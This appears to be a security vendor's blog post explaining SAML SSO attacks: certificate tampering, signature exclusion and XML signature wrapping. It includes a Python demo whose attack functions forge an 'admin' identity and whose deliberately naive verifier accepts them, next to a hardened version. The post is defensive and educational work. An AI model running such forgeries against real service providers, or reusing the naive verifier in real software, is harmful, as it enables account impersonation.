There are a few points at which an attack can happen. One is during the initial connection, while the certificate information (and whatever other metadata is needed) is being exchanged between the service provider and the identity provider.
The other is after that initial connection has been made and the single sign-on conditions are in place: the authentication server holds a session cookie and, on the next request for access, simply redirects the user back with a fresh assertion.
So when an attacker tries to inject an attack, they are either mimicking the tokens (the certificates and keys behind them) or tampering with the XML of the assertion itself.
Check out the following, taken from the defconswitzerland video:
SAML Attacks: Certificate Tampering
- Clone a certificate: copy its fields and generate new key material (only gets past an SP that matches on certificate fields rather than the exact key or fingerprint)
- Use a certificate signed by another official CA (works against an SP that accepts anything chaining to a trusted CA instead of the specific IdP certificate in its metadata)
SAML Attacks: XML
- Signature exclusion: simply delete the Signature element and see whether the SP still accepts the now unsigned message
- XML signature wrapping: keep the signed element intact so the signature still verifies, but move it so that the SP processes a different, attacker-controlled element
- Paper: "On Breaking SAML: Be Whoever You Want to Be" (USENIX Security 2012)
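To make the two XML attacks concrete, here is an added example (not code from the page or the video) that builds a SAML-style Response, runs signature exclusion and signature wrapping against it, and shows a naive SP accepting both while a hardened SP rejects both. The XML-DSig crypto is simulated: the Reference digest is a real SHA-256 over the referenced element with the enveloped signature stripped, but the SignatureValue is an HMAC with a constructed shared secret instead of an RSA signature over canonicalized SignedInfo. All names, IDs and the secret are assumptions for an offline, stdlib-only demo.

```python
"""Signature exclusion and XML signature wrapping against a SAML-style SP.
Added example; the signing crypto is a stand-in (HMAC, not RSA over C14N)."""
import base64
import copy
import hashlib
import hmac
import xml.etree.ElementTree as ET

SAMLP = "urn:oasis:names:tc:SAML:2.0:protocol"
SAML = "urn:oasis:names:tc:SAML:2.0:assertion"
DS = "http://www.w3.org/2000/09/xmldsig#"
for prefix, uri in (("samlp", SAMLP), ("saml", SAML), ("ds", DS)):
    ET.register_namespace(prefix, uri)

IDP_SECRET = b"constructed-demo-secret"  # assumption: stands in for the IdP signing key


def _digest(elem):
    """SHA-256 over the element with its own ds:Signature removed (the
    enveloped-signature transform), base64 encoded like a DigestValue."""
    clone = copy.deepcopy(elem)
    for sig in clone.findall(f"{{{DS}}}Signature"):
        clone.remove(sig)
    return base64.b64encode(hashlib.sha256(ET.tostring(clone)).digest()).decode()


def sign(assertion, key=IDP_SECRET):
    """Attach an enveloped ds:Signature whose Reference points at the assertion ID."""
    digest = _digest(assertion)
    sig = ET.SubElement(assertion, f"{{{DS}}}Signature")
    info = ET.SubElement(sig, f"{{{DS}}}SignedInfo")
    ref = ET.SubElement(info, f"{{{DS}}}Reference", URI="#" + assertion.get("ID"))
    ET.SubElement(ref, f"{{{DS}}}DigestValue").text = digest
    ET.SubElement(sig, f"{{{DS}}}SignatureValue").text = hmac.new(key, digest.encode(), "sha256").hexdigest()
    return assertion


def make_response(name_id, assertion_id="_a1"):
    """Constructed IdP response carrying one signed assertion for name_id."""
    resp = ET.Element(f"{{{SAMLP}}}Response")
    a = ET.SubElement(resp, f"{{{SAML}}}Assertion", ID=assertion_id)
    ET.SubElement(ET.SubElement(a, f"{{{SAML}}}Subject"), f"{{{SAML}}}NameID").text = name_id
    sign(a)
    return ET.tostring(resp)


def _verify_signature(root, key=IDP_SECRET):
    """Return the element the single signature actually covers, or None."""
    sigs = root.findall(f".//{{{DS}}}Signature")
    if len(sigs) != 1:
        return None
    ref = sigs[0].find(f"{{{DS}}}SignedInfo/{{{DS}}}Reference")
    if ref is None:
        return None
    target_id = ref.get("URI", "")[1:]
    target = next((e for e in root.iter() if e.get("ID") == target_id), None)
    digest = ref.findtext(f"{{{DS}}}DigestValue") or ""
    if target is None or _digest(target) != digest:
        return None
    expected = hmac.new(key, digest.encode(), "sha256").hexdigest()
    if not hmac.compare_digest(expected, sigs[0].findtext(f"{{{DS}}}SignatureValue") or ""):
        return None
    return target


def naive_sp(xml_bytes):
    """Bug 1: a response with no Signature at all is accepted unverified.
    Bug 2: it verifies *a* signature, then reads the first Assertion it finds."""
    root = ET.fromstring(xml_bytes)
    if root.find(f".//{{{DS}}}Signature") is not None and _verify_signature(root) is None:
        return None
    return root.findtext(f".//{{{SAML}}}Assertion/{{{SAML}}}Subject/{{{SAML}}}NameID")


def hardened_sp(xml_bytes):
    """Signature is mandatory, and the NameID is read from the very element the
    signature was verified over, which must be an Assertion directly under Response."""
    root = ET.fromstring(xml_bytes)
    signed = _verify_signature(root)
    if signed is None or signed.tag != f"{{{SAML}}}Assertion" or signed not in list(root):
        return None
    return signed.findtext(f"{{{SAML}}}Subject/{{{SAML}}}NameID")


def signature_exclusion(xml_bytes, name_id):
    """Attack 1: delete the Signature and rewrite the NameID."""
    root = ET.fromstring(xml_bytes)
    a = root.find(f"{{{SAML}}}Assertion")
    a.remove(a.find(f"{{{DS}}}Signature"))
    a.find(f"{{{SAML}}}Subject/{{{SAML}}}NameID").text = name_id
    return ET.tostring(root)


def signature_wrapping(xml_bytes, name_id):
    """Attack 2: keep the signed assertion byte-for-byte intact but nest it under an
    unsigned attacker assertion placed where the SP looks first."""
    root = ET.fromstring(xml_bytes)
    original = root.find(f"{{{SAML}}}Assertion")
    root.remove(original)
    evil = ET.SubElement(root, f"{{{SAML}}}Assertion", ID="_evil")
    ET.SubElement(ET.SubElement(evil, f"{{{SAML}}}Subject"), f"{{{SAML}}}NameID").text = name_id
    evil.append(original)  # the signature still verifies against _a1 in place
    return ET.tostring(root)


if __name__ == "__main__":
    good = make_response("alice")
    for label, doc in (("valid", good), ("exclusion", signature_exclusion(good, "admin")),
                       ("wrapping", signature_wrapping(good, "admin"))):
        print(f"{label:10} naive={naive_sp(doc)!r:10} hardened={hardened_sp(doc)!r}")
```

The hardened verifier does three things the naive one does not: it refuses a message with no signature, it resolves the Reference URI and recomputes the digest over exactly that element, and it takes the identity out of the element it just verified rather than out of whatever `findtext` hits first. That last step is what defeats wrapping; a deployed SP should additionally use a real XML-DSig library and pin the IdP's signing key rather than trusting any certificate that chains to a public CA.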
SSO is supposed to be a technology that makes accessing multiple network systems easier and safer. If there is a way to attack it and gain access as whoever you like, it defeats the purpose of all the defenses built on top of it.
Contact Us to discuss auditing your network environment